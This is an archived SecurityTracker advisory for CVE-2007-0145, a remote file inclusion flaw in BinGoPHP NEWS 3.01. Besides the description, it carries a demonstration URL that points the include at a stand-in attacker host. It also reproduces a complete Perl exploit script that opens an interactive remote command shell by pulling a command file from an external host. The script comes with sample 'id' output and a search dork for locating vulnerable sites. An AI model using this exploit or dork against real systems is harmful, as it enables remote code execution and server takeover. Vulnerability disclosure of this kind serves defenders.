SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Forum/Board/Portal)  >   BinGoPHP NEWS Vendors:   bingophp.free.fr
BinGoPHP NEWS Include File Bug in 'bn_smrep1.php' Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1017477
SecurityTracker URL:  http://securitytracker.com/id/1017477
CVE Reference:   CVE-2007-0145   (Links to External Site)
Updated:  May 20 2008
Original Entry Date:  Jan 8 2007
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 3.01
Description:   psych0 reported a vulnerability in BinGoPHP NEWS. A remote user can include and execute arbitrary code on the target system.

The 'bn_smrep1.php' script does not properly validate user-supplied input in the 'bnrep' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/BPNEWS/bn_smrep1.php?bnrep=http://attacker/bo3o?&

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  bingophp.free.fr/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Date:  Sun, 7 Jan 2007 13:09:30 +0000
Subject:  BinGoPHP News 3.01 (bnrep) Remote File Inclusion

#!/usr/bin/perl
#
# BinGoPHP News 3.01 (bnrep) Remote File Inclusion
# Script: BP News Version v3.01
# Website: http://bpdesign.infoliens.com/bphp/
# dl: http://bingophp.free.fr/BinGoPHPnewslast_full.zip
# Discovered by: psych0 - psych0x96 gmail com
# greetzz simo64
# *********
# vulnerable code in BPNEWS/bn_smrep1.php
# 2. include "$bnrep"."bn_configs.php";
# PoC:
# http://target/BPNEWS/bn_smrep1.php?bnrep=http://attacker/bo3o?&
# dork: "Script realise par BinGo PHP"
######################################################
#
# perl bpnews.pl http://www.tarjet.ma
#
# =====================================================
# =   BP News 3.01 (bnrep) Remote Command Execution   =
# =====================================================
#
# shell |$ id
# uid=80(www) gid=80(www) groups=80(www)
# shell |$ exit
#
# Enjoy !
#
use LWP::Simple;

print"
=====================================================
=   BP News 3.01 (bnrep) Remote Command Execution   =
=====================================================
\n";

my $targ,$rsh,$path,$con,$cmd,$data,$getit ;

$targ = $ARGV[0];
$rsh  = $ARGV[1];

if(!$ARGV[1]) {$rsh = "http://img15.imgspot.com/u/07/5/21/walou1168136692.jpg";}

if(!@ARGV) { &usage;exit(0);}

    $targ = $ARGV[0];

    
    chomp($targ);
    chomp($rsh);
    
    $path = $targ."/BPNEWS/bn_smrep1.php";
    $con  = get($path) || die "[-]Cannot connect to Host";

sub usage(){
    print "Usage : perl $0 host/path [OPTION]\n\n";
    print "Ex    : perl $0 http://www.target.com\n";
    print "        perl $0 http://www.target.com http://yoursite/yourcmd.txt\n\n";
    }

while ()  
{  
     print "shell |\$ ";
     chomp($cmd=<STDIN>);
     if ($cmd eq "exit") { print "\nEnjoy !\n\n";exit(0);}
     $getit = $path."?bnrep=".$rsh."?&cmd=".$cmd;
     $data=get($getit);
     if($cmd eq ""){ print "Please enter command !\n"; }
     else{ print $data ;}
}
#@moumou is baaaaaackkkkk
#(c) mouradmix@hotmail.com hehe:p~
#...
#**happy 3id**
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC